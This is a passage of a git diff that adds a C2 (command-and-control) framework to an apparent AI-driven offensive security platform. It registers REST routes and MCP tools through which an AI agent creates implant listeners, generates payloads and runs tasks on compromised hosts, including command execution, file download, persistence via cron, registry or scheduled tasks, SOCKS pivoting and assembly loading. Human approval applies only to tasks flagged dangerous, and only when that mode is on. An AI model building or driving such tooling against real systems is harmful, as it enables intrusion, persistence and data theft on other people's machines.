diff --git a/internal/agent/agent.go b/internal/agent/agent.go index 25bc5462..5a5ed6b4 100644 --- a/internal/agent/agent.go +++ b/internal/agent/agent.go @@ -13,6 +13,7 @@ import ( "sync" "time" + "cyberstrike-ai/internal/c2" "cyberstrike-ai/internal/config" "cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp/builtin" @@ -74,6 +75,11 @@ func agentConversationIDFromContext(ctx context.Context) string { return v } +// ConversationIDFromContext 返回当前 Agent 请求上下文中注入的对话 ID(如 C2 MCP 入队与人机协同门控使用)。 +func ConversationIDFromContext(ctx context.Context) string { + return agentConversationIDFromContext(ctx) +} + // ToolCallInterceptor allows caller to gate or rewrite tool arguments just before execution. // Returning a non-nil error means the tool call is rejected and execution is skipped. type ToolCallInterceptor func(ctx context.Context, toolName string, args map[string]interface{}, toolCallID string) (map[string]interface{}, error) @@ -1485,6 +1491,8 @@ func (a *Agent) executeToolViaMCP(ctx context.Context, toolName string, args map } }() } + // C2 危险任务 HITL 异步等待:须绑定整条 Agent 运行期 ctx,而非单次工具子 ctx(return 时会被 cancel) + toolCtx = c2.WithHITLRunContext(toolCtx, ctx) // 检查是否是外部MCP工具(通过工具名称映射) a.mu.RLock() diff --git a/internal/app/app.go b/internal/app/app.go index 32a982e1..b041a838 100644 --- a/internal/app/app.go +++ b/internal/app/app.go @@ -13,6 +13,7 @@ import ( "time" "cyberstrike-ai/internal/agent" + "cyberstrike-ai/internal/c2" "cyberstrike-ai/internal/config" "cyberstrike-ai/internal/database" "cyberstrike-ai/internal/handler" @@ -51,6 +52,9 @@ type App struct { robotMu sync.Mutex // 保护钉钉/飞书长连接的 cancel dingCancel context.CancelFunc // 钉钉 Stream 取消函数,用于配置变更时重启 larkCancel context.CancelFunc // 飞书长连接取消函数,用于配置变更时重启 + c2Manager *c2.Manager // C2 管理器 + c2Watchdog *c2.SessionWatchdog // C2 会话看门狗 + c2WatchdogCancel context.CancelFunc // 看门狗取消函数 } // New 创建新应用 @@ -338,6 +342,52 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) { skillsHandler.SetDB(db) // 设置数据库连接以便获取调用统计 } + // ============================================================================ + // 初始化 C2 模块 + // ============================================================================ + c2Manager := c2.NewManager(db, log.Logger, "tmp/c2") + // 注册 Listener 工厂 + c2Manager.Registry().Register(string(c2.ListenerTypeTCPReverse), c2.NewTCPReverseListener) + c2Manager.Registry().Register(string(c2.ListenerTypeHTTPBeacon), c2.NewHTTPBeaconListener) + c2Manager.Registry().Register(string(c2.ListenerTypeHTTPSBeacon), c2.NewHTTPSBeaconListener) + c2Manager.Registry().Register(string(c2.ListenerTypeWebSocket), c2.NewWebSocketListener) + // 设置 HITL 桥(仅当会话开启人机协同且 c2_task 不在免审批白名单时,危险任务才走桥) + c2HITLBridge := NewC2HITLBridge(db, log.Logger) + c2Manager.SetHITLBridge(c2HITLBridge) + c2Manager.SetHITLDangerousGate(func(conversationID, toolName string) bool { + return agentHandler.HITLNeedsToolApproval(conversationID, toolName) + }) + // 设置业务钩子 + c2Hooks := SetupC2Hooks(&C2HooksConfig{ + DB: db, + Logger: log.Logger, + AttackChainRecord: func(session *database.C2Session, phase string, description string) { + // 通过攻击链处理器记录(简化版,实际需要完整实现) + log.Logger.Info("C2 Attack Chain", + zap.String("session_id", session.ID), + zap.String("phase", phase), + zap.String("desc", description), + ) + }, + VulnRecord: func(session *database.C2Session, title string, severity string) { + // 记录漏洞(简化版) + log.Logger.Info("C2 Vulnerability", + zap.String("session_id", session.ID), + zap.String("title", title), + zap.String("severity", severity), + ) + }, + }) + c2Manager.SetHooks(c2Hooks) + // 恢复运行中的监听器 + c2Manager.RestoreRunningListeners() + // 启动会话看门狗 + c2Watchdog := c2.NewSessionWatchdog(c2Manager) + watchdogCtx, watchdogCancel := context.WithCancel(context.Background()) + go c2Watchdog.Run(watchdogCtx) + // 注册 C2 MCP 工具 + registerC2Tools(mcpServer, c2Manager, log.Logger, cfg.Server.Port) + // 创建OpenAPI处理器 conversationHandler := handler.NewConversationHandler(db, log.Logger) robotHandler := handler.NewRobotHandler(cfg, db, agentHandler, log.Logger) @@ -361,6 +411,9 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) { knowledgeHandler: knowledgeHandler, agentHandler: agentHandler, robotHandler: robotHandler, + c2Manager: c2Manager, + c2Watchdog: c2Watchdog, + c2WatchdogCancel: watchdogCancel, } // 飞书/钉钉长连接(无需公网),启用时在后台启动;后续前端应用配置时会通过 RestartRobotConnections 重启 app.startRobotConnections() @@ -429,6 +482,9 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) { // 设置机器人连接重启器,前端应用配置后无需重启服务即可使钉钉/飞书新配置生效 configHandler.SetRobotRestarter(app) + // 创建 C2 Handler + c2Handler := handler.NewC2Handler(c2Manager, log.Logger) + // 设置路由(使用 App 实例以便动态获取 handler) setupRoutes( router, @@ -451,6 +507,7 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) { markdownAgentsHandler, fofaHandler, terminalHandler, + c2Handler, mcpServer, authManager, openAPIHandler, @@ -542,6 +599,15 @@ func (a *App) Shutdown() { } a.robotMu.Unlock() + // 停止 C2 看门狗 + if a.c2WatchdogCancel != nil { + a.c2WatchdogCancel() + } + // 关闭 C2 Manager(停止所有监听器) + if a.c2Manager != nil { + a.c2Manager.Close() + } + // 停止所有外部MCP客户端 if a.externalMCPMgr != nil { a.externalMCPMgr.StopAll() @@ -618,6 +684,7 @@ func setupRoutes( markdownAgentsHandler *handler.MarkdownAgentsHandler, fofaHandler *handler.FofaHandler, terminalHandler *handler.TerminalHandler, + c2Handler *handler.C2Handler, mcpServer *mcp.Server, authManager *security.AuthManager, openAPIHandler *handler.OpenAPIHandler, @@ -927,6 +994,47 @@ func setupRoutes( protected.POST("/webshell/exec", webshellHandler.Exec) protected.POST("/webshell/file", webshellHandler.FileOp) + // C2 管理(AI-Native 轻量级 C2 框架) + // 监听器 + protected.GET("/c2/listeners", c2Handler.ListListeners) + protected.POST("/c2/listeners", c2Handler.CreateListener) + protected.GET("/c2/listeners/:id", c2Handler.GetListener) + protected.PUT("/c2/listeners/:id", c2Handler.UpdateListener) + protected.DELETE("/c2/listeners/:id", c2Handler.DeleteListener) + protected.POST("/c2/listeners/:id/start", c2Handler.StartListener) + protected.POST("/c2/listeners/:id/stop", c2Handler.StopListener) + // 会话 + protected.GET("/c2/sessions", c2Handler.ListSessions) + protected.GET("/c2/sessions/:id", c2Handler.GetSession) + protected.DELETE("/c2/sessions/:id", c2Handler.DeleteSession) + protected.PUT("/c2/sessions/:id/sleep", c2Handler.SetSessionSleep) + // 任务 + protected.GET("/c2/tasks", c2Handler.ListTasks) + protected.DELETE("/c2/tasks", c2Handler.DeleteTasks) + protected.GET("/c2/tasks/:id", c2Handler.GetTask) + protected.POST("/c2/tasks", c2Handler.CreateTask) + protected.POST("/c2/tasks/:id/cancel", c2Handler.CancelTask) + protected.GET("/c2/tasks/:id/wait", c2Handler.WaitTask) + protected.POST("/c2/sessions/:id/tasks", c2Handler.CreateTask) // 快捷方式:直接对会话下发任务 + // Payload + protected.POST("/c2/payloads/oneliner", c2Handler.PayloadOneliner) + protected.POST("/c2/payloads/build", c2Handler.PayloadBuild) + protected.GET("/c2/payloads/:id/download", c2Handler.PayloadDownload) + // 事件 & SSE + protected.GET("/c2/events", c2Handler.ListEvents) + protected.DELETE("/c2/events", c2Handler.DeleteEvents) + protected.GET("/c2/events/stream", c2Handler.EventStream) + // 文件管理 + protected.POST("/c2/files/upload", c2Handler.UploadFileForImplant) + protected.GET("/c2/files", c2Handler.ListFiles) + protected.GET("/c2/tasks/:id/result-file", c2Handler.DownloadResultFile) + // Malleable Profile + protected.GET("/c2/profiles", c2Handler.ListProfiles) + protected.GET("/c2/profiles/:id", c2Handler.GetProfile) + protected.POST("/c2/profiles", c2Handler.CreateProfile) + protected.PUT("/c2/profiles/:id", c2Handler.UpdateProfile) + protected.DELETE("/c2/profiles/:id", c2Handler.DeleteProfile) + // 对话附件(chat_uploads)管理 protected.GET("/chat-uploads", chatUploadsHandler.List) protected.GET("/chat-uploads/download", chatUploadsHandler.Download) diff --git a/internal/app/c2_hitl_bridge.go b/internal/app/c2_hitl_bridge.go new file mode 100644 index 00000000..7477d5a5 --- /dev/null +++ b/internal/app/c2_hitl_bridge.go @@ -0,0 +1,228 @@ +package app + +import ( + "context" + "database/sql" + "encoding/json" + "fmt" + "strings" + "time" + + "cyberstrike-ai/internal/c2" + "cyberstrike-ai/internal/database" + + "github.com/google/uuid" + "go.uber.org/zap" +) + +// C2HITLBridge 实现 C2 Manager 的 HITLBridge 接口,将危险任务桥接到现有 HITL 审批流。 +// 审批记录写入 hitl_interrupts 表,与现有 HITL 系统共享前端审批 UI。 +type C2HITLBridge struct { + db *database.DB + logger *zap.Logger + timeout time.Duration + getConvID func() string +} + +// NewC2HITLBridge 创建 C2 HITL 桥 +func NewC2HITLBridge(db *database.DB, logger *zap.Logger) *C2HITLBridge { + return &C2HITLBridge{ + db: db, + logger: logger, + timeout: 5 * time.Minute, + getConvID: func() string { return "" }, + } +} + +// SetConversationIDGetter 设置获取当前对话 ID 的函数 +func (b *C2HITLBridge) SetConversationIDGetter(fn func() string) { + b.getConvID = fn +} + +// SetTimeout 设置审批超时(0 表示不超时) +func (b *C2HITLBridge) SetTimeout(d time.Duration) { + b.timeout = d +} + +// RequestApproval 实现 HITLBridge 接口:写入 hitl_interrupts 表并轮询等待审批结果 +func (b *C2HITLBridge) RequestApproval(ctx context.Context, req c2.HITLApprovalRequest) error { + interruptID := "hitl_c2_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + now := time.Now() + + convID := req.ConversationID + if convID == "" { + convID = b.getConvID() + } + if convID == "" { + convID = "c2_system" + } + + payload, _ := json.Marshal(map[string]interface{}{ + "task_id": req.TaskID, + "session_id": req.SessionID, + "task_type": req.TaskType, + "payload": req.PayloadJSON, + "source": req.Source, + "reason": req.Reason, + "c2_operation": true, + }) + + _, err := b.db.Exec(`INSERT INTO hitl_interrupts + (id, conversation_id, message_id, mode, tool_name, tool_call_id, payload, status, created_at) + VALUES (?, ?, ?, ?, ?, ?, ?, 'pending', ?)`, + interruptID, convID, "", "approval", + c2.MCPToolC2Task, req.TaskID, + string(payload), now, + ) + if err != nil { + b.logger.Error("C2 HITL: 创建审批记录失败,拒绝执行", zap.Error(err)) + return fmt.Errorf("C2 HITL 审批记录创建失败,安全起见拒绝执行: %w", err) + } + + b.logger.Info("C2 HITL: 等待人工审批", + zap.String("interrupt_id", interruptID), + zap.String("task_id", req.TaskID), + zap.String("task_type", req.TaskType), + ) + + // Poll DB waiting for decision + ticker := time.NewTicker(500 * time.Millisecond) + defer ticker.Stop() + + var deadline <-chan time.Time + if b.timeout > 0 { + timer := time.NewTimer(b.timeout) + defer timer.Stop() + deadline = timer.C + } + + for { + select { + case <-ctx.Done(): + _, _ = b.db.Exec(`UPDATE hitl_interrupts SET status='cancelled', decision='reject', + decision_comment='context cancelled', decided_at=? WHERE id=? AND status='pending'`, + time.Now(), interruptID) + return ctx.Err() + + case <-deadline: + _, _ = b.db.Exec(`UPDATE hitl_interrupts SET status='timeout', decision='reject', + decision_comment='C2 HITL timeout auto-reject for safety', decided_at=? WHERE id=? AND status='pending'`, + time.Now(), interruptID) + b.logger.Warn("C2 HITL: 审批超时,安全起见拒绝执行", zap.String("interrupt_id", interruptID)) + return fmt.Errorf("C2 HITL 审批超时,危险任务已被自动拒绝") + + case <-ticker.C: + var status, decision string + err := b.db.QueryRow(`SELECT status, COALESCE(decision, '') FROM hitl_interrupts WHERE id = ?`, + interruptID).Scan(&status, &decision) + if err != nil { + if err == sql.ErrNoRows { + return nil + } + continue + } + switch status { + case "decided", "timeout": + if decision == "reject" { + return fmt.Errorf("C2 危险任务被人工拒绝") + } + return nil + case "cancelled": + return fmt.Errorf("C2 审批已取消") + case "pending": + continue + default: + continue + } + } + } +} + +// C2HooksConfig 配置 C2 Manager 的 Hooks +type C2HooksConfig struct { + DB *database.DB + Logger *zap.Logger + AttackChainRecord func(session *database.C2Session, phase string, description string) + VulnRecord func(session *database.C2Session, title string, severity string) +} + +// SetupC2Hooks 设置 C2 Manager 的业务钩子 +func SetupC2Hooks(cfg *C2HooksConfig) c2.Hooks { + return c2.Hooks{ + OnSessionFirstSeen: func(session *database.C2Session) { + // 新会话上线 + cfg.Logger.Info("C2 Session first seen", + zap.String("session_id", session.ID), + zap.String("hostname", session.Hostname), + zap.String("os", session.OS), + zap.String("arch", session.Arch), + ) + + // 记录漏洞(初始访问点) + if cfg.VulnRecord != nil { + cfg.VulnRecord(session, fmt.Sprintf("C2 Session Established: %s@%s", session.Username, session.Hostname), "high") + } + + // 记录攻击链(Initial Access) + if cfg.AttackChainRecord != nil { + cfg.AttackChainRecord(session, "initial-access", fmt.Sprintf("Implant beacon from %s/%s", session.Hostname, session.InternalIP)) + } + }, + OnTaskCompleted: func(task *database.C2Task, sessionID string) { + // 任务完成 + cfg.Logger.Debug("C2 Task completed", + zap.String("task_id", task.ID), + zap.String("task_type", task.TaskType), + zap.String("status", task.Status), + ) + + // 根据任务类型记录攻击链 + if cfg.AttackChainRecord != nil { + session, _ := cfg.DB.GetC2Session(sessionID) + if session != nil { + phase := taskToAttackPhase(task.TaskType) + if phase != "" { + cfg.AttackChainRecord(session, phase, fmt.Sprintf("Task %s: %s", task.TaskType, task.Status)) + } + } + } + }, + } +} + +// taskToAttackPhase 将任务类型映射到 ATT&CK 阶段 +func taskToAttackPhase(taskType string) string { + switch taskType { + case "exec", "shell": + return "execution" + case "upload": + return "persistence" + case "download": + return "exfiltration" + case "screenshot": + return "collection" + case "kill_proc": + return "impact" + case "port_fwd", "socks_start": + return "lateral-movement" + case "load_assembly": + return "defense-evasion" + case "persist": + return "persistence" + case "self_delete": + return "defense-evasion" + default: + return "execution" + } +} + +// SetupC2HITLBridgeWithAgent 设置 HITL 桥接器 +// 这个函数将由 App 调用,注入必要的依赖 +func SetupC2HITLBridgeWithAgent(db *database.DB, logger *zap.Logger) c2.HITLBridge { + return &C2HITLBridge{ + db: db, + logger: logger, + timeout: 5 * time.Minute, + getConvID: func() string { return "" }, + } +} diff --git a/internal/app/c2_tools.go b/internal/app/c2_tools.go new file mode 100644 index 00000000..23d29e96 --- /dev/null +++ b/internal/app/c2_tools.go @@ -0,0 +1,861 @@ +package app + +import ( + "context" + "encoding/json" + "fmt" + "strconv" + "strings" + "time" + + "cyberstrike-ai/internal/agent" + "cyberstrike-ai/internal/c2" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" + + "github.com/google/uuid" + "go.uber.org/zap" +) + +// registerC2Tools 注册所有 C2 MCP 工具(合并同类项,减少工具数量以节省上下文 token)。 +// webListenPort 为本进程 Web/API 监听端口(配置 server.port,启动时已加载),用于 MCP 描述中提示勿与 C2 bind_port 冲突。 +func registerC2Tools(mcpServer *mcp.Server, c2Manager *c2.Manager, logger *zap.Logger, webListenPort int) { + registerC2ListenerTool(mcpServer, c2Manager, logger, webListenPort) + registerC2SessionTool(mcpServer, c2Manager, logger) + registerC2TaskTool(mcpServer, c2Manager, logger) + registerC2TaskManageTool(mcpServer, c2Manager, logger) + registerC2PayloadTool(mcpServer, c2Manager, logger, webListenPort) + registerC2EventTool(mcpServer, c2Manager, logger) + registerC2ProfileTool(mcpServer, c2Manager, logger) + registerC2FileTool(mcpServer, c2Manager, logger) + logger.Info("C2 MCP tools registered (8 unified tools)") +} + +func makeC2Result(data interface{}, err error) (*mcp.ToolResult, error) { + if err != nil { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: err.Error()}}, + IsError: true, + }, nil + } + text, _ := json.Marshal(data) + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: string(text)}}, + }, nil +} + +// ============================================================================ +// c2_listener — 监听器统一工具 +// ============================================================================ + +func registerC2ListenerTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webListenPort int) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2Listener, + Description: fmt.Sprintf(`C2 监听器管理。通过 action 参数选择操作: +- list: 列出所有监听器 +- get: 获取监听器详情(需 listener_id) +- create: 创建监听器(需 name, type, bind_port)。成功时除 listener 外会返回 implant_token(仅此一次,用于 X-Implant-Token / oneliner;list/get/start 不再返回) +- update: 更新监听器配置(需 listener_id,可改 name/bind_host/bind_port/remark/config/callback_host) +- start: 启动监听器(需 listener_id) +- stop: 停止监听器(需 listener_id) +- delete: 删除监听器(需 listener_id) +监听器类型: tcp_reverse, http_beacon, https_beacon, websocket +端口约束:create/update 的 bind_port 禁止与本平台 Web/API 所用端口相同。当前本服务该端口为 %d(配置项 server.port,随进程启动从配置文件加载)。若 bind_port 与此相同会导致本服务或监听器 bind 失败、Beacon/oneliner 误连到 Web 而非 C2。请为监听器另选空闲端口。`, webListenPort), + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "action": map[string]interface{}{"type": "string", "description": "操作: list/get/create/update/start/stop/delete", "enum": []string{"list", "get", "create", "update", "start", "stop", "delete"}}, + "listener_id": map[string]interface{}{"type": "string", "description": "监听器 ID(get/update/start/stop/delete 需要)"}, + "name": map[string]interface{}{"type": "string", "description": "监听器名称(create/update)"}, + "type": map[string]interface{}{"type": "string", "description": "监听器类型(create)", "enum": []string{"tcp_reverse", "http_beacon", "https_beacon", "websocket"}}, + "bind_host": map[string]interface{}{"type": "string", "description": "绑定地址,默认 127.0.0.1;外网监听常用 0.0.0.0"}, + "callback_host": map[string]interface{}{"type": "string", "description": "可选:植入端/Payload 回连主机名(公网 IP 或域名)。写入 config_json;生成 oneliner/beacon 时优先于 bind_host。update 时传入空字符串可清除"}, + "bind_port": map[string]interface{}{"type": "integer", "description": fmt.Sprintf("绑定端口(create 必填)。须 ≠ %d(当前本服务 Web/API 端口,配置 server.port)", webListenPort), "minimum": 1, "maximum": 65535}, + "profile_id": map[string]interface{}{"type": "string", "description": "Malleable Profile ID"}, + "remark": map[string]interface{}{"type": "string", "description": "备注"}, + "config": map[string]interface{}{"type": "object", "description": "高级配置(beacon 路径/TLS/OPSEC 等),create/update 可用"}, + }, + "required": []string{"action"}, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + action := getString(params, "action") + id := getString(params, "listener_id") + + switch action { + case "list": + listeners, err := m.DB().ListC2Listeners() + if err != nil { + return makeC2Result(nil, err) + } + for _, li := range listeners { + li.EncryptionKey = "" + li.ImplantToken = "" + } + return makeC2Result(map[string]interface{}{"listeners": listeners, "count": len(listeners)}, nil) + + case "get": + listener, err := m.DB().GetC2Listener(id) + if err != nil { + return makeC2Result(nil, err) + } + if listener == nil { + return makeC2Result(nil, fmt.Errorf("listener not found")) + } + listener.EncryptionKey = "" + listener.ImplantToken = "" + return makeC2Result(map[string]interface{}{"listener": listener}, nil) + + case "create": + var cfg *c2.ListenerConfig + if cfgRaw, ok := params["config"]; ok && cfgRaw != nil { + cfgBytes, _ := json.Marshal(cfgRaw) + cfg = &c2.ListenerConfig{} + _ = json.Unmarshal(cfgBytes, cfg) + } + input := c2.CreateListenerInput{ + Name: getString(params, "name"), + Type: getString(params, "type"), + BindHost: getString(params, "bind_host"), + BindPort: int(getFloat64(params, "bind_port")), + ProfileID: getString(params, "profile_id"), + Remark: getString(params, "remark"), + Config: cfg, + CallbackHost: getString(params, "callback_host"), + } + listener, err := m.CreateListener(input) + if err != nil { + return makeC2Result(nil, err) + } + implantToken := listener.ImplantToken + listener.EncryptionKey = "" + listener.ImplantToken = "" + return makeC2Result(map[string]interface{}{ + "listener": listener, + "implant_token": implantToken, + }, nil) + + case "update": + listener, err := m.DB().GetC2Listener(id) + if err != nil { + return makeC2Result(nil, err) + } + if listener == nil { + return makeC2Result(nil, fmt.Errorf("listener not found")) + } + if m.IsListenerRunning(id) { + newHost := getString(params, "bind_host") + newPort := int(getFloat64(params, "bind_port")) + if (newHost != "" && newHost != listener.BindHost) || (newPort > 0 && newPort != listener.BindPort) { + return makeC2Result(nil, fmt.Errorf("cannot modify bind address while listener is running")) + } + } + if v := getString(params, "name"); v != "" { + listener.Name = v + } + if v := getString(params, "bind_host"); v != "" { + listener.BindHost = v + } + if v := int(getFloat64(params, "bind_port")); v > 0 { + listener.BindPort = v + } + if v := getString(params, "profile_id"); v != "" { + listener.ProfileID = v + } + if v, ok := params["remark"]; ok { + listener.Remark, _ = v.(string) + } + if cfgRaw, ok := params["config"]; ok && cfgRaw != nil { + cfgBytes, _ := json.Marshal(cfgRaw) + listener.ConfigJSON = string(cfgBytes) + } + if _, ok := params["callback_host"]; ok { + pcfg := &c2.ListenerConfig{} + raw := strings.TrimSpace(listener.ConfigJSON) + if raw == "" { + raw = "{}" + } + _ = json.Unmarshal([]byte(raw), pcfg) + pcfg.CallbackHost = strings.TrimSpace(getString(params, "callback_host")) + pcfg.ApplyDefaults() + cfgBytes, err := json.Marshal(pcfg) + if err != nil { + return makeC2Result(nil, err) + } + listener.ConfigJSON = string(cfgBytes) + } + if err := m.DB().UpdateC2Listener(listener); err != nil { + return makeC2Result(nil, err) + } + listener.EncryptionKey = "" + listener.ImplantToken = "" + return makeC2Result(map[string]interface{}{"listener": listener}, nil) + + case "start": + listener, err := m.StartListener(id) + if err != nil { + return makeC2Result(nil, err) + } + listener.EncryptionKey = "" + listener.ImplantToken = "" + return makeC2Result(map[string]interface{}{"listener": listener}, nil) + + case "stop": + err := m.StopListener(id) + return makeC2Result(map[string]interface{}{"stopped": err == nil}, err) + + case "delete": + err := m.DeleteListener(id) + return makeC2Result(map[string]interface{}{"deleted": err == nil}, err) + + default: + return makeC2Result(nil, fmt.Errorf("unknown action: %s", action)) + } + }) +} + +// ============================================================================ +// c2_session — 会话统一工具 +// ============================================================================ + +func registerC2SessionTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2Session, + Description: `C2 会话管理。通过 action 参数选择操作: +- list: 列出会话(可按 listener_id/status/os/search 过滤) +- get: 获取会话详情及最近任务历史(需 session_id) +- set_sleep: 设置心跳间隔(需 session_id) +- kill: 下发 exit 任务让 implant 退出(需 session_id) +- delete: 删除会话记录(需 session_id)`, + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "action": map[string]interface{}{"type": "string", "description": "操作: list/get/set_sleep/kill/delete", "enum": []string{"list", "get", "set_sleep", "kill", "delete"}}, + "session_id": map[string]interface{}{"type": "string", "description": "会话 ID(get/set_sleep/kill/delete 需要)"}, + "listener_id": map[string]interface{}{"type": "string", "description": "按监听器过滤(list)"}, + "status": map[string]interface{}{"type": "string", "description": "按状态过滤: active/sleeping/dead/killed(list)"}, + "os": map[string]interface{}{"type": "string", "description": "按 OS 过滤: linux/windows/darwin(list)"}, + "search": map[string]interface{}{"type": "string", "description": "模糊搜索 hostname/username/IP(list)"}, + "limit": map[string]interface{}{"type": "integer", "description": "返回数量上限(list)"}, + "sleep_seconds": map[string]interface{}{"type": "integer", "description": "心跳间隔秒数(set_sleep)"}, + "jitter_percent": map[string]interface{}{"type": "integer", "description": "抖动百分比 0-100(set_sleep)"}, + }, + "required": []string{"action"}, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + action := getString(params, "action") + id := getString(params, "session_id") + + switch action { + case "list": + filter := database.ListC2SessionsFilter{ + ListenerID: getString(params, "listener_id"), + Status: getString(params, "status"), + OS: getString(params, "os"), + Search: getString(params, "search"), + } + if limit := int(getFloat64(params, "limit")); limit > 0 { + filter.Limit = limit + } + sessions, err := m.DB().ListC2Sessions(filter) + return makeC2Result(map[string]interface{}{"sessions": sessions, "count": len(sessions)}, err) + + case "get": + session, err := m.DB().GetC2Session(id) + if err != nil { + return makeC2Result(nil, err) + } + if session == nil { + return makeC2Result(nil, fmt.Errorf("session not found")) + } + tasks, _ := m.DB().ListC2Tasks(database.ListC2TasksFilter{SessionID: id, Limit: 10}) + return makeC2Result(map[string]interface{}{"session": session, "tasks": tasks}, nil) + + case "set_sleep": + sleep := int(getFloat64(params, "sleep_seconds")) + jitter := int(getFloat64(params, "jitter_percent")) + err := m.DB().SetC2SessionSleep(id, sleep, jitter) + return makeC2Result(map[string]interface{}{"updated": err == nil, "sleep_seconds": sleep, "jitter_percent": jitter}, err) + + case "kill": + task, err := m.EnqueueTask(c2.EnqueueTaskInput{ + SessionID: id, + TaskType: c2.TaskTypeExit, + Payload: map[string]interface{}{}, + Source: "ai", + ConversationID: agent.ConversationIDFromContext(ctx), + UserCtx: ctx, + }) + return makeC2Result(map[string]interface{}{"task": task}, err) + + case "delete": + err := m.DB().DeleteC2Session(id) + return makeC2Result(map[string]interface{}{"deleted": err == nil}, err) + + default: + return makeC2Result(nil, fmt.Errorf("unknown action: %s", action)) + } + }) +} + +// ============================================================================ +// c2_task — 任务下发统一工具(合并所有 task 类型) +// ============================================================================ + +func registerC2TaskTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2Task, + Description: `在 C2 会话上下发任务。所有任务类型通过 task_type 参数指定: +- exec: 执行命令(需 command) +- shell: 交互式命令,保持 cwd(需 command) +- pwd/ps/screenshot/socks_stop: 无额外参数 +- cd/ls: 需 path +- kill_proc: 需 pid +- upload: 需 remote_path + file_id +- download: 需 remote_path +- port_fwd: 需 action(start/stop) + local_port + remote_host + remote_port +- socks_start: 需 port(默认 1080) +- load_assembly: 需 data(base64) 或 file_id,可选 args +- persist: 可选 method(auto/cron/bashrc/launchagent/registry/schtasks) +返回 task_id,用 c2_task_manage 的 wait/get_result 获取结果。`, + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "session_id": map[string]interface{}{"type": "string", "description": "C2 会话 ID(s_xxx)"}, + "task_type": map[string]interface{}{"type": "string", "description": "任务类型", "enum": []string{"exec", "shell", "pwd", "cd", "ls", "ps", "kill_proc", "upload", "download", "screenshot", "port_fwd", "socks_start", "socks_stop", "load_assembly", "persist"}}, + "command": map[string]interface{}{"type": "string", "description": "命令(exec/shell)"}, + "path": map[string]interface{}{"type": "string", "description": "路径(cd/ls)"}, + "pid": map[string]interface{}{"type": "integer", "description": "进程 ID(kill_proc)"}, + "remote_path": map[string]interface{}{"type": "string", "description": "远程路径(upload/download)"}, + "file_id": map[string]interface{}{"type": "string", "description": "服务端文件 ID(upload/load_assembly)"}, + "data": map[string]interface{}{"type": "string", "description": "base64 数据(load_assembly)"}, + "args": map[string]interface{}{"type": "string", "description": "命令行参数(load_assembly)"}, + "action": map[string]interface{}{"type": "string", "description": "start/stop(port_fwd)"}, + "local_port": map[string]interface{}{"type": "integer", "description": "本地端口(port_fwd)"}, + "remote_host": map[string]interface{}{"type": "string", "description": "远程主机(port_fwd)"}, + "remote_port": map[string]interface{}{"type": "integer", "description": "远程端口(port_fwd)"}, + "port": map[string]interface{}{"type": "integer", "description": "SOCKS5 端口(socks_start),默认 1080"}, + "method": map[string]interface{}{"type": "string", "description": "持久化方法(persist): auto/cron/bashrc/launchagent/registry/schtasks"}, + "timeout_seconds": map[string]interface{}{"type": "integer", "description": "超时秒数,默认 60"}, + }, + "required": []string{"session_id", "task_type"}, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + sessionID := getString(params, "session_id") + taskTypeStr := getString(params, "task_type") + taskType := c2.TaskType(taskTypeStr) + timeout := getFloat64(params, "timeout_seconds") + + payload := map[string]interface{}{"timeout_seconds": timeout} + + switch taskType { + case c2.TaskTypeExec, c2.TaskTypeShell: + payload["command"] = getString(params, "command") + case c2.TaskTypeCd, c2.TaskTypeLs: + payload["path"] = getString(params, "path") + case c2.TaskTypeKillProc: + payload["pid"] = params["pid"] + case c2.TaskTypeUpload: + payload["remote_path"] = getString(params, "remote_path") + payload["file_id"] = getString(params, "file_id") + case c2.TaskTypeDownload: + payload["remote_path"] = getString(params, "remote_path") + case c2.TaskTypePortFwd: + payload["action"] = getString(params, "action") + payload["local_port"] = params["local_port"] + payload["remote_host"] = getString(params, "remote_host") + payload["remote_port"] = params["remote_port"] + case c2.TaskTypeSocksStart: + payload["port"] = params["port"] + case c2.TaskTypeLoadAssembly: + payload["data"] = getString(params, "data") + payload["file_id"] = getString(params, "file_id") + payload["args"] = getString(params, "args") + case c2.TaskTypePersist: + payload["method"] = getString(params, "method") + case c2.TaskTypePwd, c2.TaskTypePs, c2.TaskTypeScreenshot, c2.TaskTypeSocksStop: + // no extra params + default: + return makeC2Result(nil, fmt.Errorf("unsupported task_type: %s", taskTypeStr)) + } + + input := c2.EnqueueTaskInput{ + SessionID: sessionID, + TaskType: taskType, + Payload: payload, + Source: "ai", + ConversationID: agent.ConversationIDFromContext(ctx), + UserCtx: ctx, + } + task, err := m.EnqueueTask(input) + if err != nil { + return makeC2Result(nil, err) + } + return makeC2Result(map[string]interface{}{"task_id": task.ID, "status": task.Status}, nil) + }) +} + +// ============================================================================ +// c2_task_manage — 任务管理工具(查询/等待/取消) +// ============================================================================ + +func registerC2TaskManageTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2TaskManage, + Description: `C2 任务管理。通过 action 参数选择操作: +- get_result: 获取任务详情和结果(需 task_id) +- wait: 阻塞等待任务完成并返回结果(需 task_id) +- list: 列出任务(可按 session_id/status 过滤) +- cancel: 取消排队中的任务(需 task_id)`, + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "action": map[string]interface{}{"type": "string", "description": "操作: get_result/wait/list/cancel", 